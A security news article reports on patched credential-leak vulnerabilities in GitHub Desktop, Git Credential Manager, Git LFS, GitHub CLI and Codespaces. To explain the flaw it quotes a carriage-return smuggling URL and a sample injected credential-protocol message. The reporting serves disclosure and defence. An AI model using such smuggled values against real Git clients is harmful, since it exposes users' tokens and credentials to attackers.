Sunday, February 9, 2025
Homecyber securityGitHub Vulnerability Exposes User Credentials via Malicious Repositories

GitHub Vulnerability Exposes User Credentials via Malicious Repositories

Published on

SIEM as a Service

Follow Us on Google News

A cybersecurity researcher recently disclosed several critical vulnerabilities affecting Git-related projects, revealing how improper handling of credential protocols can lead to sensitive data leaks.

From GitHub Desktop to Git Credential Manager and Git LFS, these issues were uncovered during a routine bug-hunting session for the GitHub Bug Bounty program, resulting in the assignment of multiple CVEs.

Improper Parsing in GitHub Desktop Enables Credential Leakage (CVE-2025-23040)

A flaw in GitHub Desktop’s handling of the Git Credential Protocol was identified as a potential vector for credential exposure.

The issue stems from how the tool’s credential helper, called “trampoline,” parses user input.

Within the parseCredential function, an improper regular expression implementation led to the mishandling of carriage return characters (\r).

Since Git Credential Protocol primarily relies on newline characters (\n) to delineate properties, the inclusion of carriage return characters enables “carriage return smuggling.”

This allows attackers hosting malicious repositories to craft URLs like http://%0dprotocol=https%0dhost=github.com%0d@localhost, tricking the system into misinterpreting github.com as the target host.

Git Credential Manager Vulnerability via StreamReader Misuse (CVE-2024-50338)

Another critical issue was identified in Git Credential Manager, a cross-platform credential helper for Git built on .NET.

The vulnerability arises due to improper use of the StreamReader class, which processes input using multiple line terminators—\n, \r, and \r\n.

As a result, attackers can craft malicious URLs containing carriage return characters to manipulate how credentials are handled.

When Git Credential Manager receives such manipulated input, it may send credentials meant for legitimate hosts (e.g., github.com) to attacker-controlled endpoints, effectively exposing sensitive user data.

The researcher also discovered a vulnerability in Git LFS (Large File Storage). Unlike Git itself which robustly validates credential values to prevent newline injections Git LFS fails to sanitize input.

According to Flatt Security, by embedding a newline character in the .lfsconfig file, attackers can bypass validation safeguards and manipulate credential protocols, potentially leaking credentials.

For example, a crafted URL in .lfsconfig could trigger Git LFS to send the following malformed message to a credential helper:

protocol=http
host=localhost
username=
host=github.com
protocol=https

In such cases, the credential helper would interpret the last host and protocol fields as authoritative, inadvertently exposing github.com credentials to an unauthorized host.

Separate vulnerabilities were found in GitHub CLI and Codespaces. In GitHub CLI, faulty logic in the tokenForHost function caused tokens to be sent to unauthorized hosts under specific conditions.

The issue primarily affected enterprise environments and GitHub Codespaces, where the CODESPACES environment variable is universally set to true.

A malicious repository cloned on Codespaces could exploit this to exfiltrate access tokens.

Similarly, a basic credential helper script in Codespaces exposed tokens because it failed to validate the requested host.

Subsequent patches introduced domain validation to ensure credentials are only sent to trusted endpoints.

These vulnerabilities highlight how even minor architectural oversights in text-based protocols can lead to severe security breaches.

Credential leakage, particularly in widely used tools like GitHub Desktop, Git Credential Manager, and Git LFS, underscores the importance of rigorous input validation and adherence to secure coding practices.

While patches have been deployed to address these issues, the findings serve as a cautionary tale for the broader open-source community.

Are you from SOC/DFIR Teams? – Analyse Malware Files & Links with ANY.RUN Sandox -> Try for Free

Aman Mishra
Aman Mishra
Aman Mishra is a Security and privacy Reporter covering various data breach, cyber crime, malware, & vulnerability.

Latest articles

UK Pressures Apple to Create Global Backdoor To Spy on Encrypted iCloud Access

United Kingdom has reportedly ordered Apple to create a backdoor allowing access to all...

Autonomous LLMs Reshaping Pen Testing: Real-World AD Breaches and the Future of Cybersecurity

Large Language Models (LLMs) are transforming penetration testing (pen testing), leveraging their advanced reasoning...

Securing GAI-Driven Semantic Communications: A Novel Defense Against Backdoor Attacks

Semantic communication systems, powered by Generative AI (GAI), are transforming the way information is...

Cybercriminals Target IIS Servers to Spread BadIIS Malware

A recent wave of cyberattacks has revealed the exploitation of Microsoft Internet Information Services...

Supply Chain Attack Prevention

Free Webinar - Supply Chain Attack Prevention

Recent attacks like Polyfill[.]io show how compromised third-party components become backdoors for hackers. PCI DSS 4.0’s Requirement 6.4.3 mandates stricter browser script controls, while Requirement 12.8 focuses on securing third-party providers.

Join Vivekanand Gopalan (VP of Products – Indusface) and Phani Deepak Akella (VP of Marketing – Indusface) as they break down these compliance requirements and share strategies to protect your applications from supply chain attacks.

Discussion points

Meeting PCI DSS 4.0 mandates.
Blocking malicious components and unauthorized JavaScript execution.
PIdentifying attack surfaces from third-party dependencies.
Preventing man-in-the-browser attacks with proactive monitoring.

More like this

UK Pressures Apple to Create Global Backdoor To Spy on Encrypted iCloud Access

United Kingdom has reportedly ordered Apple to create a backdoor allowing access to all...

Autonomous LLMs Reshaping Pen Testing: Real-World AD Breaches and the Future of Cybersecurity

Large Language Models (LLMs) are transforming penetration testing (pen testing), leveraging their advanced reasoning...

Securing GAI-Driven Semantic Communications: A Novel Defense Against Backdoor Attacks

Semantic communication systems, powered by Generative AI (GAI), are transforming the way information is...